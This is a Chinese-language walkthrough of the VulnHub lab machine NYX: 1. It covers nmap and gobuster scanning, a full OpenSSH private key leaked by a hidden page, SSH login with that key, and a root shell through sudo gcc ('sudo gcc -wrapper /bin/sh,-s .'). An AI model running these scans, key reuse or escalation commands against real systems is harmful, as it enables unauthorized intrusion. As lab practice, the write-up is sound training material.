vulnhub - NYX: 1
描述
这是一个简单的盒子,非常基本的东西。
它是基于vmware的,我不知道它是否可以在VB上运行,如果你愿意的话可以测试一下。
/home/$user/user.txt 和 /root/root.txt 下有 2 个标志。
信息收集
NYX靶ip:192.168.157.159
nmap -sT -sV -sC -O -p22,80 192.168.157.159
先看看网站
在源代码得到注释
<!-- Dont waste your time looking into source codes/robots.txt etc , focus on real stuff -->
不要浪费时间查看源代码/robots.txt等,专注于真实的东西
还是尝试一下目录扫描
sudo gobuster dir -u 192.168.157.159 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
没扫到有用信息,指定文件再扫一次
sudo gobuster dir -u 192.168.157.159 -x txt,php,jsp -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
访问/key.php,是个输入框,看来还缺少key值
回到nmap漏洞探测
sudo nmap --script=vuln -p22,80 192.168.157.159
发现了/d41d8cd98f00b204e9800998ecf8427e.php,访问得到一个rsa私钥
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABFwAAAAdzc2gtcn
NhAAAAAwEAAQAAAQEA7T94TmbqiRlc6jGh6UOKyKVux+bYoskAdOybtgCfoh064CTHLTMT
HNnXWI8sT1Ml19svvVGnZZKmDTbS/7uOpgsmvO0pmqirCVo0UvD0YhKXVEwkTtmUvPBPAX
ucGRtefJcCtLWnSc4yMtzbYzSYEultUW5EfqqTwfjh48fxvLk1/kznO7EknxpLMupf6hJz
NbGLLbRwINeIjdC0k6iMdMrZ3n58Cho3kigNKSqcyBpkePE+RvnCBegtxBX/m1pUjPjYKY
zdZ0DROQyU3t7Wu6iX4TW688adHjAgXP7ERN0tL6RoJB9vHxO1GmGt5CLoJBYND1uLoTRe
p7xkIPwwgwAAA8iiu9/dorvf3QAAAAdzc2gtcnNhAAABAQDtP3hOZuqJGVzqMaHpQ4rIpW
7H5tiiyQB07Ju2AJ+iHTrgJMctMxMc2ddYjyxPUyXX2y+9UadlkqYNNtL/u46mCya87Sma
qKsJWjRS8PRiEpdUTCRO2ZS88E8Be5wZG158lwK0tadJzjIy3NtjNJgS6W1RbkR+qpPB+O
Hjx/G8uTX+TOc7sSSfGksy6l/qEnM1sYsttHAg14iN0LSTqIx0ytnefnwKGjeSKA0pKpzI
GmR48T5G+cIF6C3EFf+bWlSM+NgpjN1nQNE5DJTe3ta7qJfhNbrzxp0eMCBc/sRE3S0vpG
gkH28fE7UaYa3kIugkFg0PW4uhNF6nvGQg/DCDAAAAAwEAAQAAAQAaUzieOn07yTyuH+O/
Zmc37GNmew7+wR7z2m1MvLT54BRwWqRfN5OfV+y1Pu3Dv44rbX7WmwDgHG2gebzf84fYlN
QvkoFTT/Pqjb/QlDwJxdZU3D4LIcmHTYL2vyiLAKZzXK5ILv/pCKA5VJhjYaqeLpiauImR
JIxQsbUe+UixkATg7u3c/lkPH4p7POb7JJVbemKO07vzUSK3wzMWSukZs5ZZXKH8L5ypSy
CxPe4AUaO5IuXeKPeq45Q7lUvVKAFdxte438jup4YeyS7lbi2+BggJLt3W4jAlrWxaDhK3
/EICCIT8zLt+baltm/xrfiRM2OxTP2S/6/AQlkbSOaBBAAAAgQDTmKPk3pBpmR0tm5KmSK
6ubJkOfjcVwsLlZcVDHOcFIrgbNkEZPqqEnnRQD7BSBz0I05L1H8VgDR4ZkkgVqKmePhI9
Fs3NVsCasih8UubG2TTsGcvOalU+X6zagDiGWxxLNrQ81NBmCUBWPB/dFG+dUo9T0XigNQ
1lD1s4trUG6QAAAIEA/BlxOWPyLx4UHGO7RrrKEjWKpw2Ma6iRbQOo5HfmrJ+mZvUP+qBs
+Qgj3g+Qgt6y+EH67oxWeX/xTti1xHAc0Qx59181QrBFojp0XWtRumhASFC/TceBuP1fYe
DIZ6gYNXN/Pw7PFKStceO/Qhmee+K1/6XRwEvRSvXKG5a7sQ8AAACBAPDrM5bkjXYD9cq7
xfkT1t16YzqK9BmgFgSyOFQjtqFuLt4JtsQhPfip2QZkSCyPk8cVNx74Wvs4rxYl5pacmf
CR8v83WYMc6h4oBLmcxZsxMpaP8B/N7DZeS76A6idz+Cdj6BTmgMh7xFTXQOgB6Gh9LZmE
KXo/rW1gDQ8R+yFNAAAAC21wYW1waXNAbnl4AQIDBAUGBw==
-----END OPENSSH PRIVATE KEY-----
ssh登入
尝试利用这个私钥登入,尝试后发现用户名是mpampis(一开始完全没注意。。)
登入成功拿到第一个flag
查看权限
mpampis@nyx:~$ sudo -l
Matching Defaults entries for mpampis on nyx:env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/binUser mpampis may run the following commands on nyx:(root) NOPASSWD: /usr/bin/gcc
mpampis@nyx:~$
在/usr/bin/gcc可以直接执行,那就在https://gtfobins.github.io/可以搜索到相应的提权方法
sudo gcc -wrapper /bin/sh,-s .
提权成功,这里的root.txt是空的,就不去管了
总结
目录扫描时指定文件效果可能会更好
尽可能搜集多的信息并尝试利用
第一次接触到 https://gtfobins.github.io/ ,好用~
